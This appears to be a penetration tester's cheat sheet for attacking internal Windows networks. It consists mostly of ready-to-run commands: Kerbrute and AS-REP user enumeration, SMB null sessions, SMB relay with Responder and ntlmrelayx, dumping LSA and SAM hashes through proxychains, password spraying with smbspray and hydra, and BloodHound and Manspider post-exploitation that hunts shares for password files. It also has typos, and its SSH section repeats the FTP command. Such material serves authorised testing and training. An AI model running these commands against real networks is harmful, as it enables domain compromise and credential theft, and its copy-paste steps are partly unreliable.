Internal (Kali)
Starting with some NMap Scans/Scripts we can find plenty of other information for more targeted attacks and finding other attack paths/vectors. Then depending if we were given user credentials to perform a "compromised user" approach, we can go down other paths, but either way we would want to check for all of these with and without credentials.
User Enumeration
Without already being given user credentials, we can try to find some using Kerbrute, and GetNPUsers.py. These methods can be loud but still effective.
Kerbrute - A little louder
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
./kerbrute_linux_amd64 userenum -d DOMAIN --dc DC-IP USERLIST.txt -v -o Outfile.txt
GetNPUsers.py - Can be stealthy but not always.
GetNPUsers.py DOMAIN/ -usersfile USERLIST.txt -dc-ip DC-IP -no-pass
SMB Null Sessions
I like to use SMBCrunch(SMBHunt.pl), and Netexec
git clone https://github.com/Raikia/SMBCrunch.git && cd SMBCrunch
sudo ./smbhunt.pl -i ../445.txt
sudi netexec smb <target-ip> -u "" -p "" --shares
View Null sessions with
sudo smbclient -L //target/share -U ""
SMB Relays
If SMB Signing is not Required for multiple machines, we can attempt to abuse SMB Relays with Responder, NTLMRelayX (From Impacket), and Proxychains.
Disable SMB and HTTP in Responder.conf (/etc/responder/Responder.conf):
sudo sed -i 's/SMB = On/SMB = Off/g' /etc/responder/Responder.conf
sudo sed -i 's/HTTP = On/HTTP = Off/g' /etc/responder/Responder.conf
Change the proxychains config (/etc/proxychains4.conf)
sudo sed -i 's/9050/1080/g' /etc/proxychains4.conf
Use NetExec to generate a list of hosts that has SMB signing not required (--gen-relay-list)
sudo netexec smb up-hosts.txt --gen-relay-list relay.txt
Run Responder
sudo python3 /usr/share/responder/Responder.py -I eth0 -PDv --lm
Run NTLMRelayX in a new window/tab while Responder is running.
sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf relay.txt -socks -smb2support -i -of relyed-hashes.txt
When we have capture relays, we can try and crack the captured hashed, but while we crack them we can abuse the relays using NetExec.
View Shares hosted on target machine
sudo proxychains4 netexec smb ip -u user -p '' --shares
Dump LSA
sudo proxychains4 netexec smb ip -u user -p '' --lsa
Dump SAM hashes
sudo proxychains4 netexec smb ip -u user -p '' --sam
General Enumeration
Finding Domain Controller IP. These aren't guaranteed but can be used in most cases.
Using NSLookup
nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
Using DIG
dig _ldap._tcp.dc._msdcs.<domain> SRV
Checking /etc/resolv.conf
cat /etc/resolv.conf
Web Services
Look at all http/https pages for login pages, information disclosure, default login credentials, robots.txt, and other directories.
sudo ffuf -recursion -mc all -ac -c -e https://domain/FUZZ -w wordlist.txt
sudo ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w wordlist.txt -u https://domain/FUZZ -fc 400,401,403,404,406,500,502 > domain.txt
FTP
Checking if FTP is open, and if anonymous login is enabled.
sudo nmap -p 21 --script ftp-anon -iL 21.txt
SSH
Checking if SSH is open and if it takes password authentication.
sudo nmap -p 21 --script ftp-anon -iL 21.txt
Password Spraying
SMB
git clone https://github.com/absolomb/smbspray.git && cd smbspray
python3 smbspray.py -u users.txt -p passwords.txt -ip DC-IP
SSH
Using hydra
hydra -L users.txt -P passwords.txt ssh://IP
Post Exploitation
Once we have obtained credentials we can find even more info. I like to find more info from: LDAPDomainDump, Bloodhound (Bloodhound.py), and Manspider.
Bloodhound / Bloodhound-Python
sudo bloodhound-python -u USER -p PASSWORD -ns DNS Server -d DOMAIN -c All
Once we have the .json files, we can ingest them into bloodhound to look for domain admins, kerberoastable accounts, and more.
sudo ldapdomaindump -u DOMAIN\\USER -p PASSWORD IP
Crawl network shares to find any helpful info, such as files with cleartext passwords, password databases, and more.
Install
pipx install git+https://github.com/blacklanternsecurity/MANSPIDER
Search hostname/IP for files with "passw" in the name:
manspider TARGET -f passw -d DOMAIN -u USER -p 'PASSWORD'
Search for documents containing passwords
manspider TAGRGET -c passw -d DOMAIN -u USER -p 'PASSWORD'
Last updated